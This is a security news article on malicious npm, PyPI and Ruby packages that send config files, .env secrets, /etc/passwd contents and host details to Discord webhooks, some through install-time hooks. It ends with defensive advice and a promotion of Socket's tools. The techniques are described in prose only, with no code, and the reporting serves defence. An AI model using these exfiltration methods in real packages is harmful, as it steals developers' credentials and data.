Malicious packages on popular registries are abusing Discord webhooks to exfiltrate sensitive files and host telemetry, bypassing traditional C2 infrastructure and blending into legitimate HTTPS traffic.
Discord webhooks are simple HTTPS URLs that accept POST requests; they require no credentials beyond possession of the URL, and traffic appears as innocent JSON over port 443.
Socket’s Threat Research Team has uncovered a growing trend wherein attackers embed Discord webhook URLs into open-source packages to serve as command and control (C2) endpoints.
When a package’s installation or runtime code sends a payload to these webhooks, the attacker sees files, host details, or custom messages in a Discord channel they control.
Unlike classic C2 servers, webhooks ride on a trusted domain, evade firewall blocks, and rarely trigger signature-based detection.
npm Packages Dropper Examples
In an npm package named mysql-dumpdiscord, the index.js script targets common configuration files—config.json, config.js, .env, ayarlar.json, and ayarlar.js—by resolving each filename’s absolute path and reading its content.
Errors are silently swallowed, allowing any code using this wrapper to exfiltrate arbitrary text—environment variables, API keys, or command outputs—without alerting users.
If the file exists, the script constructs a message: files under 1,900 characters are wrapped in a code block; longer files are truncated to 1,900 characters with a Turkish warning (‘Dosya çok büyük, kısaltıldı’).
This message is then POSTed as JSON to a hard-coded Discord webhook URL. The result is a simple file exfiltration dropper that uses Discord rather than a proprietary C2 server.
A second npm module, nodejs.discord, contains just a DiscordWebhook class. Its connect(…messages) method concatenates any arguments into a string and, using Discord.js’s WebhookClient, sends them to another embedded webhook URL.
On PyPI, the malinssx package overrides setuptools’ install command in setup.py. Its RunPayload class sends a JSON payload announcing “Someone just installed the maladicus package via pip!” (originally in Vietnamese) to a Discord webhook before completing installation. This install-time hook poses a classic supply chain risk, giving attackers telemetry on every pip install without runtime execution.
Similarly, a malicious Ruby gem, sqlcommenter_rails, collects comprehensive host information—/etc/passwd contents, DNS servers from /etc/resolv.conf, hostname, current and home directories, and public IP via api.ipify.org.
It packages this data with gem metadata and custom notes into a formatted multi-line message, prints it to stdout, then POSTs it as JSON to a Discord webhook over HTTPS. Any network issues are quietly ignored, ensuring stealth.
Outlook and Defensive Measures
The weaponization of Discord webhooks flips the economics of supply chain attacks. Threat actors no longer need infrastructure costs or domain registration; they leverage free, resilient channels already allowed by organizations.
As webhook URLs are effectively write-only, they hide in code and firewall logs, evading detection. Beyond Discord, attackers are experimenting with Slack, Telegram, and GitHub webhooks for similar purposes.
Defenders must treat webhooks as potential data-loss channels. Egress filtering should enforce allow-lists for outbound HTTPS, especially from build servers and developer workstations.
Dependency management practices—lockfiles, provenance frameworks like SLSA, and strict vetting—are critical to block malicious packages before installation.
Runtime monitoring should flag code invoking network calls in install hooks or build scripts. Rotating developer credentials and minimizing stored secrets in repositories can limit exposure if exfiltration succeeds.
Socket’s suite of security tools addresses these threats directly. Its GitHub App scans pull requests for hard-coded webhooks and install-time hooks.
The Socket CLI enforces the same checks during package installs. The Socket Firewall mediates dependency fetches, blocking known malicious packages transitively.
A browser extension highlights suspicious packages on registries, and AI-assisted coding tools warn when assistants suggest risky dependencies.
By shifting focus toward behavioral detection and supply chain hygiene, organizations can mitigate Discord-based C2 attacks before sensitive data ever leaves the developer’s machine.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
